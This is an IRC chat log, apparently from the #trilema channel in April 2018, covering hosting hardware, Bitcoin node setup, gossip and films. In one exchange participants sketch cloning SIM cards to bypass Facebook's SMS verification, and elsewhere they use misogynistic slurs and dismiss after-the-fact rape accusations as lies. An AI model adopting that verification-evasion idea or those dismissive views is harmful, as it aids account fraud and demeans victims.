is iirc within 10% of ordinary dose 1804020;1524252975;mircea_popescu;right. 1804021;1524253002;mircea_popescu;ckang, doesn't sound all that credible, does it ? who'd want to. 1804022;1524253011;ckang;his ex-gf, sarah torrents 1804023;1524253041;ckang;she had text messages and stuff of him strung out crying 1804024;1524253044;BingoBoingo; BingoBoingo, do you happen to know which ? << Narrowed it down to 2014 1804025;1524253051;asciilifeform;ckang: such proofy proof 1804026;1524253060;mircea_popescu;who [among the set of people who do weird 2010-kiddo pills] would want to [trade some of this apparently valuable crap] for sticking fingers up some ugly fat dood's asshole. 1804027;1524253090;ckang;asciilifeform: it will take some time to find again but if you want to i can try 1804028;1524253102;mircea_popescu;and don't tell me "this billionaire i talk to actually has pics of it", because that's really not how examples work. 1804029;1524253107;asciilifeform;ckang: i dun particularly need it for anyffin 1804030;1524253258;mircea_popescu;ckang, let me unwrap the challenge here further, for the record. so, the claim "he would let you stick 4 fingers in his ass for a dose" made by ex-gf is being challenged on credibility grounds through this following two pronged approach : 1. it is seemingly unlikely any of the poor who actually hold physical $item in discussion would nevertheless be subjectively rich enough to trade it away, especially for something as unlike 1804031;1524253258;mircea_popescu;ly to be valuable to them as "shoving fingers in guy's assohle" ; while 2. ex-gfs will say anything. 1804032;1524253259;mircea_popescu;see ? 1804033;1524253301;ckang;ill find it ;) give me a min, she was pretty straight forward with things 1804034;1524253309;mircea_popescu;he doesn't see. 1804035;1524253319;ckang;no i see what you are saying 1804036;1524253325;mircea_popescu;at issue isn't whether you can produce a graphical representation of the claim. 1804037;1524253331;ckang;but i want to re-listen anyways 1804038;1524253339;mircea_popescu;a ok then! 1804039;1524253398;*;asciilifeform meanwhile preparing return of... phuctor! 1804040;1524253417;mircea_popescu;yaa! 1804041;1524253433;asciilifeform;dulap-III humming along very happily. 1804042;1524253443;asciilifeform;and ftr 32 cpu is a mighty spiffy thing. 1804043;1524253469;mircea_popescu;3ehehehe 1804044;1524253486;asciilifeform;( phuctor II had 16 ) 1804045;1524253491;asciilifeform;dulap II rather 1804046;1524253716;ckang;https://imgur.com/a/cT7p4 1804047;1524253727;ckang;https://imgur.com/a/K6YCt 1804048;1524253745;BingoBoingo;mircea_popescu: FOUND http://trilema.com/2014/i-saw-and-was-saddened/ 1804049;1524253806;mircea_popescu;whoa! 1804050;1524253816;mircea_popescu;well done jeez. was "rabite" i'd have never remembered that. 1804051;1524253819;ckang;https://www.irccloud.com/pastebin/Im5lOyZx/ 1804052;1524253844;ckang;cell2poin is sarah, the ex-gf 1804053;1524253865;mircea_popescu;http://trilema.com/2014/i-saw-and-was-saddened/#selection-425.1-429.89 awww how 2014 came and went. 1804054;1524254001;mircea_popescu;ckang, honestly can't distinguish that from http://trilema.com/2012/assault-and-consent-in-the-bdsm-community-sau-cum-s-ar-zice-pe-romaneste-viol-si-pace-ma-rog-aproximativ-vorbind/ or http://trilema.com/2015/the-four-points-of-this-morning-in-color-any-questions/#selection-219.0-221.37 or any other example of "ex-gf" bs. 1804055;1524254005;mircea_popescu;anyway, i shall bbl. 1804056;1524254075;mircea_popescu;but let's just point out that ANY post factum "testimonials" by gf/bf/whatever, whether they be "i thought about it some more and i decided it was rape" or "i will now call the guy a badman retroactively" and so on aren\'t worthj the pixels they're printed on. 1804057;1524254085;mircea_popescu;if he was so fucking bad, where was she/he/whatever AT THE TIME ? 1804058;1524254109;ckang;ill get the clip for yall though, its an interesting listen regardless 1804059;1524254121;mircea_popescu;all counterfactual history is that -- counterfactual. meaning, not real. false. a lie. 1804060;1524254229;ckang;yea but up until jan of this year weev denied his ancestry vehemently 1804061;1524254307;ckang;but it was something that everyone already knew, it was just funny since he put himself in that community 1804062;1524254643;asciilifeform;>> http://www.loper-os.org/pub/fg_typical.jpg << last ( for nao, i'ma bbl ) but not least 1804063;1524254655;asciilifeform;^ dulap-III fg emplacement 1804064;1524254748;asciilifeform;smg got same type 1804065;1524254779;asciilifeform;trinque got a more barbaric emplacement, he has no slack space in his chassis, his ended up in the pci slots 1804066;1524254807;*;asciilifeform bbl in a bit 1804067;1524255397;deedbot;http://qntra.net/2018/04/pantsuit-media-mocks-reality-of-prison-sexual-violence-against-men/ << Qntra - Pantsuit Media Mocks Reality Of Prison Sexual Violence Against Men 1804068;1524256227;lobbes;In other lulz, D.C. pantsuits trying to extend illusion of franchise to 16 year olds >> https://archive.is/y84nX 1804069;1524256468;ben_vulpes;so now they'll be able to vote and not be drafted *or* drink 1804070;1524256666;trinque;pantsuit pulling out the stops eh? children voting, black reparations, legal weed. I'm sure trump voters will defect in droves for such a platform 1804071;1524257357;ckang;found the audio, extracting it now 1804072;1524257609;pinochle;ubi, sallie mae jubilee on deck 1804073;1524257811;ckang;mircea_popescu: asciilifeform https://vocaroo.com/i/s1p0rtngI86E 1804074;1524258471;phf;http://btcbase.org/log/2018-04-20#1803946 << that's a good idea, there are different use cases though. i speak much less, so i use the yellow islands to know where i participated in the conversation, this way i know i don't have to reread that whole cluster. it highlights both from:phf and "phf", so i can also say where i was mentioned since the last time i spoke 1804075;1524258471;a111;Logged on 2018-04-20 19:12 mircea_popescu: i do about the same thing, i'm grayed out. 1804076;1524258488;phf;*see 1804077;1524258575;phf;i can also search from:phf to see any messages left my way, but highlight is more convenient if i'm just reading through the log. 1804078;1524259122;phf;yeah http://btcbase.org/log/2018-04-20?nick=phf vs. http://btcbase.org/log/2018-04-20?nick=mircea 1804079;1524259400;douchebag;lol ckang 1804080;1524259407;douchebag;that was Mother right? 1804081;1524259922;ckang;mother was with her ya 1804082;1524259970;trinque;man this is not interesting at all 1804083;1524260026;trinque;chittering high ex-gf cunt; who hasn't got one? 1804084;1524260253;asciilifeform;http://btcbase.org/log/2018-04-20#1804073 << wassat ?? 1804085;1524260253;a111;Logged on 2018-04-20 20:56 ckang: mircea_popescu: asciilifeform https://vocaroo.com/i/s1p0rtngI86E 1804086;1524260263;ckang;asciilifeform: the clip you asked for 1804087;1524260333;asciilifeform;i asked for this ?? 1804088;1524260345;*;asciilifeform can't be arsed to boot up box with sound card for this rubbish 1804089;1524260451;ckang;yea i wouldnt go out of my way to listen or anything, just goes over the cuck/captagon stuff mostly 1804090;1524260771;asciilifeform;!~later tell BingoBoingo http://p.bvulpes.com/pastes/Ka6ZE/?raw=true 1804091;1524260772;jhvh1;asciilifeform: The operation succeeded. 1804092;1524260806;*;asciilifeform bbl 1804093;1524260843;BingoBoingo;asciilifeform: ack 1804094;1524264512;ben_vulpes;!~ticker --market all 1804095;1524264570;ben_vulpes;pinochle: you'll want to get a bouncer so that you're not joining and parting all of the time 1804096;1524264799;trinque;I hear somebody's selling shell accounts that'd be just the place 1804097;1524264969;ben_vulpes;eyyy 1804098;1524264991;ben_vulpes;yeah i guess pinochle is in l2 now at that 1804099;1524265020;ben_vulpes;pinochle: for .003 btc/mo you can get a shared shell on a real fuckin workhorse of a machine 1804100;1524265039;ben_vulpes;good for blogs, irc bouncers, irc bots... 1804101;1524265101;*;trinque can confirm his blog's way faster on uy1 than in its previous slum 1804102;1524265248;ben_vulpes;https://imgur.com/BrgTd0u 1804103;1524265266;asciilifeform;or even rockchip 1804104;1524265270;ben_vulpes;!!up jhvh1 1804105;1524265270;deedbot;jhvh1 voiced for 30 minutes. 1804106;1524265275;ben_vulpes;!~ticker --market all 1804107;1524265330;asciilifeform;http://btcbase.org/log/2018-04-20#1804102 << wassat 1804108;1524265330;a111;Logged on 2018-04-20 23:00 ben_vulpes: https://imgur.com/BrgTd0u 1804109;1524265346;ben_vulpes;spam-grade coinbase phishin 1804110;1524265430;mircea_popescu;sooo, the car went by a large sign, "grandes descuentos", which my head perceived as "discouns on grenades" and i was wtf, who discounts grenades. 1804111;1524265438;mircea_popescu;and then WTF CONVENIENCE STORE GRENADES ?!?! 1804112;1524265490;ben_vulpes;did you jump on it? 1804113;1524265514;mircea_popescu;lmao 1804114;1524265533;mircea_popescu;i thought that was your job. 1804115;1524265550;ben_vulpes;FOR TEH PEEEPUBLIC 1804116;1524265574;asciilifeform;f--, instead of 5s fuse had 2s, face fulla frag, chinesium , wouldnotbuyagain!!1 1804117;1524265618;ben_vulpes;heh now i'm imagining it just sputtering and limpwristedly cracking open and letting out some magic smoke 1804118;1524265622;ben_vulpes;quelle anticlimax 1804119;1524265657;mircea_popescu;asciilifeform, aha. 1804120;1524265665;asciilifeform;ben_vulpes: this actually happens, if live fuse but no filling 1804121;1524265680;asciilifeform;just hisses, pops, breaks the 'turtle' 1804122;1524265709;ben_vulpes;neato, sounds like grade-a 'jackass' material 1804123;1524265749;asciilifeform;( what do you call in eng , the iron part of grenade ? ) 1804124;1524265760;mircea_popescu;then of course groundskeeper wanted to talk to me about bombillas 1804125;1524265767;mircea_popescu;which aren't small bombs ; but how they say lightbulbs. 1804126;1524265801;mircea_popescu;asciilifeform, skirting ? 1804127;1524265936;mircea_popescu;http://btcbase.org/log/2018-04-20#1804068 << there was this pretty bad pantsuit cult movie, about some rock band that becomes politically involved by lowering the vote age. 1804128;1524265936;a111;Logged on 2018-04-20 20:30 lobbes: In other lulz, D.C. pantsuits trying to extend illusion of franchise to 16 year olds >> https://archive.is/y84nX 1804129;1524265968;asciilifeform;speaking of these, in BingoBoingostan i saw for 1st time in public ( tho i knew of their existence) those oddball diode bulbs made to look ~exactly like edisonian ones 1804130;1524265980;asciilifeform;with convincing filament etc 1804131;1524265990;mircea_popescu;http://btcbase.org/log/2018-04-20#1804072 << whoa that jubilee thing still exists ?! 1804132;1524265990;a111;Logged on 2018-04-20 20:53 pinochle: ubi, sallie mae jubilee on deck 1804133;1524266023;mircea_popescu;http://rollingjubilee.org/ << in other lulz. 1804134;1524266034;mircea_popescu;asciilifeform, o ya. 1804135;1524266099;ben_vulpes;does anyone remember a scifi story about a dark horse us presidental candidate that wins a landslide on individually-targeted email/sms/phone outreach in the last month of the campaign? 1804136;1524266218;mircea_popescu;https://www.nakedcapitalism.com/2014/10/rolling-jubilee-wolf-sheeps-clothing.html << and here's pansuitism mouthpiece bemoaning how group of swindlers are not so interested in the "staying within the system" of occupy-wallstreet nonsense. 1804137;1524266361;asciilifeform;both $item and -$item , lulzy reads 1804138;1524266468;mircea_popescu;you were complaining ows was about as productive as ethereum... well... 1804139;1524267113;mircea_popescu;http://btcbase.org/log/2018-04-20#1804083 << i don't, actually. at least so far. 1804140;1524267113;a111;Logged on 2018-04-20 21:33 trinque: chittering high ex-gf cunt; who hasn't got one? 1804141;1524267141;mircea_popescu;you'd have expected the "experts" to have invented one by now. 1804142;1524267203;mircea_popescu;http://btcbase.org/log/2018-04-20#1804101 << they have some shiny gear there ; how long it stays great is to be established, but it starts in a spanking place. 1804143;1524267203;a111;Logged on 2018-04-20 22:58 trinque can confirm his blog's way faster on uy1 than in its previous slum 1804144;1524267286;asciilifeform;mircea_popescu: there's spares for all the iron 1804145;1524267311;asciilifeform;or didja mean that it will rot from overload, or disorganization, or etc 1804146;1524267361;mircea_popescu;well yeah. 1804147;1524267366;mircea_popescu;everything ages. 1804148;1524267411;asciilifeform;in theory yes. in practice i have yet to see certain items age detectably. my cockpit cpus for instance, will soon score 10yr of uptime 1804149;1524267420;asciilifeform;ditto ram 1804150;1524267488;asciilifeform;i'll add that ~all the gear we installed, is of roughly similar vintage. 1804151;1524267509;mircea_popescu;promising :D 1804152;1524267510;asciilifeform;( with exception of ssd naturally ) 1804153;1524267513;asciilifeform;lol 1804154;1524267570;asciilifeform;rly there is precious little point buying iron ( other than disposables like ssd ) made after death of moor's law 1804155;1524267594;asciilifeform;moar recent boxen simply carry moar fritz in'em... 1804156;1524267647;asciilifeform;the 1 possible exception is oddball 22nm and smaller chinesium, rockbox, allwinner, etc 1804157;1524267652;asciilifeform;lessee if demand for these 1804158;1524267677;asciilifeform;( so far only 2 takers, so i'ma hold off on building the supergiant farm of these ) 1804159;1524268215;ben_vulpes;"codes of conduct" are a 1804160;1524268226;ben_vulpes;net negative and a blight on open source repos: https://news.ycombinator.com/item?id=16886487 1804161;1524268233;ben_vulpes;more quotes required 1804162;1524268322;mircea_popescu;kek 1804163;1524268340;mircea_popescu;missing from there : "as we read on trilema years ago" and "clearly mp knows better than all of us" 1804164;1524268468;mircea_popescu;asciilifeform, yes, pizarro clawed itself out of the first pit, "we don't have what to sell". 1804165;1524268507;asciilifeform;mircea_popescu: aha, was the easy pit 1804166;1524268527;asciilifeform;( entirely mechanical job ) 1804167;1524268532;mircea_popescu;right, in that sense. 1804168;1524268937;asciilifeform;the other thing we do, is custom iron; currently typified by ' x + n x FG' . but can be whatever customer likes, potentially. 1804169;1524268979;asciilifeform;( iirc mircea_popescu one time tried getting heathen hosters to install fg, and found none who would attempt it ) 1804170;1524268996;mircea_popescu;indeed. 1804171;1524269073;asciilifeform;btw can mircea_popescu et al think of a good reason to set up a public fg fountain? ( given how it is easy to do nao ) 1804172;1524269139;mircea_popescu;notrly. 1804173;1524269149;*;asciilifeform currently can't think of any use for such a thing 1804174;1524269177;*;mod6 is into rockchip \o/ 1804175;1524269216;asciilifeform;mod6: got your login ? 1804176;1524269222;mod6;yup 1804177;1524269227;asciilifeform;how's the box ? 1804178;1524269246;mod6;so far, great. just logged in. 1804179;1524269262;asciilifeform;try some torture tests ( serve up warez etc ) 1804180;1524269313;mod6;lol 1804181;1524269329;mircea_popescu;uh 1804182;1524269478;asciilifeform;theoretically should make for princely mpwp etc, also. 1804183;1524269634;asciilifeform;btw i found that the dc, contrary to expectation, has ok radio reception. which means that we could make gsm modem bank etc 1804184;1524269673;mod6;ah interesting 1804185;1524269689;asciilifeform;( iirc mircea_popescu at least once had an experiment that needed numerous sms receivers. could set this up in iron nao, in principle. ) 1804186;1524269727;asciilifeform;the sunday flea market, of all places, had ~infinite supply of that very particular huawei gsm modem that is used for this. 1804187;1524269842;mircea_popescu;nah, they detect the broadband sort. 1804188;1524269860;asciilifeform;not broadband sort. 100% voice. 1804189;1524269864;mircea_popescu;also, very hard to beat the 1.x bucks a card thing here. 1804190;1524269866;mircea_popescu;hm ? 1804191;1524269874;asciilifeform;i wrote a linux thingie that drives'em 1804192;1524269887;mircea_popescu;no ? what does it need ? 1804193;1524269888;asciilifeform;mircea_popescu: aha, they take standard voice sims 1804194;1524269901;asciilifeform;and operate as 'phone' 1804195;1524269917;asciilifeform;you get pcm in/out, and dtmf encode,decode also 1804196;1524269945;mircea_popescu;i don't get it. so you wrote a linux thingee which materializes some hardware into any arbitrary box ? 1804197;1524269948;asciilifeform;BingoBoingostan appears to have cheap sims also 1804198;1524269985;asciilifeform;mircea_popescu: possibly i oughta elaborate 1804199;1524269993;mircea_popescu;please do. 1804200;1524270056;asciilifeform;gadget in question is ~= to the 'business end' of typical pnoje, 'baseband'. little bugger that takes a sim, and exposes a usb socket, from which one can dial, pickup/hangup, and pump pcm voice in/out. is all. 1804201;1524270068;mircea_popescu;but you have to put the physical simm in there. 1804202;1524270077;asciilifeform;and no it is not distinguishable on telco end or dialee end from a pnoje. 1804203;1524270107;asciilifeform;mircea_popescu: correct. tho it is possible in principle to locate the sim elsewhere 1804204;1524270112;mircea_popescu;whereas what would be useful would be a linux thingee which TAKES SOME BINARY, and does that for any arbitrary simm. 1804205;1524270120;asciilifeform;exists 1804206;1524270138;asciilifeform;the simulated gsm thing for 'hackrf' universal radiotron 1804207;1524270143;mircea_popescu;well now like that, then yes very much helpful. i could buy 10k simms here, read them, put them into al arge blob file and have the item there ready. 1804208;1524270147;asciilifeform;( also fakes base station. 1804209;1524270149;asciilifeform;) 1804210;1524270161;asciilifeform;this is doable 1804211;1524270176;mircea_popescu;and like this i expect it'd be very much a killer app, "pizarro destroys facebook authentication. make your facebook acct here, 0 cost" 1804212;1524270185;asciilifeform;is what i was thinking 1804213;1524270186;mircea_popescu;maybe we manage to get some countries entirely banned from facebook. 1804214;1524270217;mircea_popescu;seems you still need a few parts emplaced. but i expect the masses would love such service. 1804215;1524270228;mircea_popescu;because apparently lotta butthurt over facebook "banning" etc. 1804216;1524270250;asciilifeform;i expect they'll want arseprints or sumthing, next 1804217;1524270264;mircea_popescu;hey, ynot. they'll still cost a buck. 1804218;1524270284;mircea_popescu;the whole fucking point of existence is to make life unlivable for the poor after all. 1804219;1524270285;asciilifeform;right nao 'sms auth' is typically enuff problem for typical orc 1804220;1524270324;mircea_popescu;there's "Services" but they dun work. 1804221;1524270340;mircea_popescu;which is how i ended up brewing my own in the first place. 1804222;1524270397;asciilifeform;mircea_popescu: there's multiple lulz layers in this subj : 1804223;1524270438;asciilifeform;for instance, sim card is supposed to resist 'reading', has elaborate fritzology. but usually quite susceptible to elementary diddle ( dpa mainly ) 1804224;1524270449;mircea_popescu;i've not been following the subject, is "simm" item even broken ? what is it, a rfid chip i expect ? 1804225;1524270462;asciilifeform;nah, contactful chip 1804226;1524270470;asciilifeform;predates rfidism 1804227;1524270482;mircea_popescu;yes but basically, it's just the same crap as found in a contemporary rfid 1804228;1524270484;asciilifeform;hides a privkey 1804229;1524270488;asciilifeform;aha 1804230;1524270493;mircea_popescu;actual privkey or holywater privkey ? 1804231;1524270518;mircea_popescu;i vaguely recall it had a weak-ish aes thing 1804232;1524270525;asciilifeform;buncha randomola, which it hashes on demand with challenge string 1804233;1524270543;asciilifeform;( details on www, not seekrit ) 1804234;1524270559;ben_vulpes;asciilifeform: dpa? 1804235;1524270561;asciilifeform;128b iirc 1804236;1524270568;asciilifeform;ben_vulpes: diff power anal. 1804237;1524270569;mircea_popescu;yes but small and power dependent, so iirc takes minutes to crack one. 1804238;1524270580;mircea_popescu;right. 1804239;1524270671;asciilifeform;old noose, too. 1804240;1524270705;mircea_popescu;now, not entirely clear that it's worth it to bother. so the story is, you buy however many of these, say $2 each, then put them through a machine to be cloned, then have server select the right one at a time... meh. 1804241;1524270708;mircea_popescu;seems hardly worth it. 1804242;1524270717;asciilifeform;i have nfi whether worth anything. 1804243;1524270728;asciilifeform;but listing it as a physical possibility. 1804244;1524270743;mircea_popescu;you end up with costs over ten bucks a number, and all this so what, so you can make a facebook acct worth exactly the same as facebook inc, ie 0 ? 1804245;1524270772;mircea_popescu;this kinda reminds me of a discussion re romania's 1980s automotive industry, "a car back then, brand new dacia, cost about $800 in real money" 1804246;1524270773;mircea_popescu;"wow!" 1804247;1524270776;asciilifeform;i have nfi what this is used for, i still labour under impression that spam is -ev and a cargo cult 1804248;1524270784;mircea_popescu;"it was WORTH about that much, also. you seen the shits ?" 1804249;1524270786;mircea_popescu;"hm." 1804250;1524270799;asciilifeform;'worth at. 1804251;1524270802;mircea_popescu;"this is why communism went away, it used up 2k worth of fuel and 5k worth of metal to produce $800 worth cars" 1804252;1524270808;asciilifeform;frg scrapyard' 1804253;1524270828;asciilifeform;'spend bil to make mil' 1804254;1524270846;mircea_popescu;asciilifeform, no, oin a strict utility basis. i wouldn't pay a whole grand to have https://s1.cdn.autoevolution.com/images/gallery/RENAULT-12-2038_12.jpg 1804255;1524270871;asciilifeform;funnily enuff, those were on the road in timis 1804256;1524270874;mircea_popescu;anyway. this ultimately seems about the same thing. 1804257;1524270880;asciilifeform;and not 1 or 2 either 1804258;1524270892;mircea_popescu;asciilifeform, im sure there's plenty $800 "investments" from 1972 that still haven't fully amortised. 1804259;1524270929;asciilifeform;a trabantoid is not 'investment' tho, anymoar than pair of wooden shoes 1804260;1524270937;asciilifeform;it's a poverty artifact 1804261;1524270947;mircea_popescu;not disputing the fu factor of "we don't care about your blather, republic uses your sims and phones as cumrags". but meh, we dun have the hands on deck for such excursions into wank qua cool. 1804262;1524270957;mircea_popescu;asciilifeform, poverty of the spirit. 1804263;1524270976;asciilifeform;mircea_popescu: right, not unless it is monetizable somehow. and afaik it aint 1804264;1524281266;pinochle;ben_vulpes: http://btcbase.org/log/2018-04-20#1804099 << am interested, will follow up but off for the night 1804265;1524281266;a111;Logged on 2018-04-20 22:57 ben_vulpes: pinochle: for .003 btc/mo you can get a shared shell on a real fuckin workhorse of a machine 1804266;1524283803;*;mircea_popescu logs into trilema admin panel, after a whole day. autocanned spams = 12. pending items = 0. win. 1804267;1524283903;mircea_popescu;!#s onefixt 1804268;1524283904;a111;118 results for "onefixt", http://btcbase.org/log-search?q=onefixt 1804269;1524285568;deedbot;http://trilema.com/2018/buy-some-scammer-delinquent-debt-why-dont-you/ << Trilema - Buy some scammer delinquent debt why don't you! 1804270;1524286712;ben_vulpes;!!v F3DA79D6B20116885BDE05129E761731F5A561410EF11AF98CE68AFF730CEBCA 1804271;1524286712;deedbot;ben_vulpes rated pinochle 1 << sophisticated infiltrator 1804272;1524286798;ben_vulpes;pinochle: i also have "rockchip" microservers for rent, 4 core, 1.4 GHz, reasonable amounts of storage should you desire to isolate your operations from peers in the wot http://pizarroisp.net/index.php/pizarro-hosting-rate-sheet/ 1804273;1524287991;ckang;ben_vulpes: have you done any test on the reliability of those USB3 drives? 1804274;1524306439;mircea_popescu;!!up shurdeek 1804275;1524306441;deedbot;shurdeek voiced for 30 minutes. 1804276;1524306443;mircea_popescu;who might you be ? 1804277;1524317346;asciilifeform;http://btcbase.org/log/2018-04-21#1804273 << nope. you're invited to buy the same drive and test. fwiw, and unlike cheaper ones, it has wear leveling. 1804278;1524317346;a111;Logged on 2018-04-21 05:19 ckang: ben_vulpes: have you done any test on the reliability of those USB3 drives? 1804279;1524317370;asciilifeform;and observe that the pizarro rockboxen are build without swapism. 1804280;1524317376;asciilifeform;*built 1804281;1524317432;ckang;ah thats what i was going to ask 1804282;1524317729;asciilifeform;( asciilifeform never enables swap at all, period. it is an anachronism. ) 1804283;1524317813;ckang;http://www.cypress.com/documentation/application-notes/an89661-usb-raid-1-disk-design-using-ez-usbr-fx3stm 1804284;1524317831;ckang;i was considering using this and spinning a board at one point 1804285;1524317852;ckang;but the fx3s is still pretty pricey in low volume 1804286;1524317853;asciilifeform;ckang: idiocy; they will wear at same rate 1804287;1524317864;asciilifeform;in raid1 1804288;1524317871;asciilifeform;and fail at same moment 1804289;1524317893;ckang;most servers are going to that setup though 1804290;1524317899;ckang;new ones anyways 1804291;1524317912;asciilifeform;because fauxraid and again idiot buyers 1804292;1524317923;asciilifeform;and FUCK 'most are going' 1804293;1524317932;asciilifeform;with red hot arse poker. 1804294;1524317940;ckang;all our new dells do anyway 1804295;1524317955;ckang;granted we still use usb drives... 1804296;1524317974;asciilifeform;i will not be buying any fauxraids. or dells. 1804297;1524318040;ckang;even with low writes, every usb seems to fail after a year of being plugged up and running 1804298;1524318051;ckang;granted its mostly consumer grade stuff, samsung 1804299;1524318054;ckang;sandisk 1804300;1524318127;asciilifeform;ckang: i have nfi what you've been buying; over here i have boxen that've been running off usb drives for 4+ yrs 1804301;1524318131;asciilifeform;24/7 1804302;1524318184;asciilifeform;just . don't. fucking. swap. to. them. and don't winblowz/crapple/whatever shituntus insist on constantly massaging the drive for no reason. 1804303;1524318220;ckang;mostly use them for esxi host, not a big deal if it dies fortunately 1804304;1524318309;ckang;http://pizarroisp.net/index.php/pizarro-hosting-rate-sheet/ <-- down? 1804305;1524318328;asciilifeform;nope 1804306;1524318331;asciilifeform;loads for me 1804307;1524318524;asciilifeform;re drives : do recall that you get a phree yearly swap, ~if needed~ . 1804308;1524318585;asciilifeform;( if we pull the 'failed' drive, and all sectors write ok, you'll be getting that same drive again. ) 1804309;1524318615;asciilifeform;and backups are the customer's responsibility. always and without exception. 1804310;1524318623;ckang;do you have the drive model by chance? 1804311;1524318660;ckang;the ones I have are samsung usb3 dont advertise wear leveling 1804312;1524318688;asciilifeform;MUF-128BB/AM 1804313;1524318696;ckang;ty 1804314;1524318715;asciilifeform;supposed to have it. i dun have the chipset datashit tho, cannot say for certain. 1804315;1524318756;ckang;hmm actually i have a few of those in use now 1804316;1524318844;asciilifeform;it's a reasonably common item 1804317;1524319805;mod6;mornin' TMSR~ 1804318;1524319822;asciilifeform;ohai mod6 1804319;1524319843;mod6;feelin better today? got some rest? 1804320;1524319852;asciilifeform;mod6: a bit 1804321;1524319872;mod6;*nod* 1804322;1524319889;mod6;feel free to relax for a few days if you need to recover from mega-flight 1804323;1524319908;asciilifeform;mod6: some relax but lotsa chores, gotta get dulap3 doing its thing 1804324;1524320262;mod6;werd. 1804325;1524325263;asciilifeform;!!up avgjoe 1804326;1524325263;deedbot;avgjoe voiced for 30 minutes. 1804327;1524325276;avgjoe;thanks, i'm registered on deedbot 1804328;1524325276;lobbesbot;avgjoe: Sent 1 day, 21 hours, and 32 minutes ago: I don't talk to strangers in private 1804329;1524325396;avgjoe;so i'd like to ask what happens if there are other "avgjoe" logged on irc and my client change a bit the username to log me in 1804330;1524325412;avgjoe;is there a way to register the username on the channel? 1804331;1524325487;asciilifeform;avgjoe: https://freenode.net/kb/answer/registration etc 1804332;1524325513;asciilifeform;it's a fleanode chan, reg yer nick on fleanode 1804333;1524325553;avgjoe;when i log in it says: Your host is hobana.freenode.net[], 1804334;1524325565;asciilifeform;aha 1804335;1524325572;asciilifeform;follow their recipe, reg the nick 1804336;1524325930;avgjoe;ok, i just wanted to report my experience installing TRB. On debian stretch after installing all the dependencies listed on http://thebitcoin.foundation/trb-howto.html , i've modified on /etc/apt/sources.list the repo to the jessie one, then installed gcc and g++ 4.9, then reversed back to stretch 1804337;1524326119;avgjoe;after installing the deps, i had to set export CPPFLAGS="-P" , otherwise it fails in the middle 1804338;1524326179;avgjoe;then started the bitcoind with LC_ALL=C in front of the command and started syncing 1804339;1524326339;avgjoe;so far is working properly on debian 9 just modifying the repo (because stretch repo hasn't gcc 4.x) 1804340;1524326418;avgjoe;my question is: if i add nodes that aren't on the trusted nodes list, what are the risks? 1804341;1524327665;BingoBoingo; my question is: if i add nodes that aren't on the trusted nodes list, what are the risks? << Unknown, generally desirable to get more connections. The idea of the list is to provide a minimum number of non-evil nodes to help you stay in civilized communion. 1804342;1524327717;avgjoe;but aren't new blocks fetched from evil implementations? 1804343;1524327751;avgjoe;someone (not my server, but some other trb instance) is going to get from who these blocks? 1804344;1524327776;BingoBoingo;Maybe? Maybe not? The question is do the blocks validate as good. 1804345;1524327831;BingoBoingo;If the blocks are good, they are Bitcoin Blocks. If not, they are some sort of altcoin (but probably not capital A Altcoin) blocks 1804346;1524327871;avgjoe;ok i understand, so i shouldn't worry if for instance i connect to a segwit node, my node will try to chop off the irrelevant parts of what it receive, correct? 1804347;1524327961;avgjoe;so the trusted nodes list is more useful on the initial startup when there are a lot of blocks to download and it'd be easier to just have nodes that doesn't send unnecessary info (like segwit payload)? 1804348;1524327978;BingoBoingo;Segwit nodes usually have been bricked to the point of not successfully connecting to the Bitcoin network 1804349;1524328063;BingoBoingo;And Segwit can't in the form the Power Rangers settled on arbitrarily slice shit off of transactions or blocks. Segwit is an opt-in evil. It can only tickle your butthole if you let it in. 1804350;1524328149;avgjoe;other curiosity i've not found on logs: what does it means bastard block on the debug.log? 1804351;1524328175;BingoBoingo;The node is unaware of the block's parentage. 1804352;1524328201;BingoBoingo;It may be a good block, it it will have to try getting accepted again once the node is aware of its daddy 1804353;1524328892;BingoBoingo;This keeps bastards from unproductively filling up RAM 1804354;1524330838;danielpbarron;http://btcbase.org/log/2018-04-20#1804073 << lol this is from l0de radio hour 1804355;1524330838;a111;Logged on 2018-04-20 20:56 ckang: mircea_popescu: asciilifeform https://vocaroo.com/i/s1p0rtngI86E 1804356;1524332502;deedbot;http://danielpbarron.com/2018/a-true-church-at-porcfest/ << Daniel P. Barron - A True Church at PorcFest 1804357;1524334146;deedbot;http://trinque.org/2018/04/21/houston-art-car-parade/ << trinque - Houston Art Car Parade 1804358;1524335002;mircea_popescu;!!up shurdeek 1804359;1524335003;deedbot;shurdeek voiced for 30 minutes. 1804360;1524335004;mircea_popescu;there ? 1804361;1524335211;mircea_popescu;danielpbarron, btw, ask darwin if he ever saw "beyond the forest" ? possibly bette davis' best movie (which, predictably, she hated doing, thought was terrible when done, luckily for the world jack warner existed and the hallucinations of choice and self-determination of 1940s pantsuits went straight nowhere) 1804362;1524335358;lobbes;ha, my favorite's gotta be the d00d riding the lawnmower-piano >> http://trinque.org/2018/04/21/houston-art-car-parade/ 1804363;1524335401;trinque;this is what happens when you don't have phf's three generations of bidet before piano. 1804364;1524336433;mircea_popescu;trinque, reviewed red dragon with girl yest, there's that scene when the nut confronts blake's drawing, derpy museum guide in the background "200 years old!". drew some laughs, fuck me, we held 800 yo manuscripts. europe is fulla them. 1804365;1524336484;mircea_popescu;http://trinque.org/wp-content/uploads/artcar/1ptEibDKTTeV15LCEUo9Rg_thumb_377.jpg << "gonna run for president, then got high." aaaayup. 1804366;1524336617;BingoBoingo; trinque, reviewed red dragon with girl yest, there's that scene when the nut confronts blake's drawing, derpy museum guide in the background "200 years old!". drew some laughs, fuck me, we held 800 yo manuscripts. europe is fulla them. << I prefer the original filmed version "Manhunter", Very 1980's product. 1804367;1524336641;mircea_popescu;trinque, : "I guess the guy thought Mad Max wasn't fabulous enough." << this. this is where your divine nature shines through. it's fucking perfect, i've been gasping for air the past minute. 1804368;1524336662;mircea_popescu;fabulous, right, because we weren't supposed to notice madmax is gay interest for the sort who "go viking". 1804369;1524336680;mircea_popescu;BingoBoingo, hard to say no to hopkins etc. 1804370;1524336860;trinque;lol yeah, serious gay vibes throughout. 1804371;1524337034;mircea_popescu;aha. 1804372;1524337127;mircea_popescu;good quality humour always includes a pinch to heaping spoonfuls of ~providing something in short supply~. the pantsuit tards translate this as "speak truth to power", but it's utter bullshit. the politics of humour are uninteresting from a humor-centered perspective ; but the economics of humor are not -- because economics was blessed by god originally with this and only this its attribute : you will forever be field-relevan 1804373;1524337127;mircea_popescu;t to any field howsoever defined. 1804374;1524337145;mircea_popescu;and have you noticed how little PATRONIZING of gays is available on the discoursive shelves of today ? 1804375;1524337177;mircea_popescu;that's my own explanation for myself as to what has just happened to me, for the record. "the guy 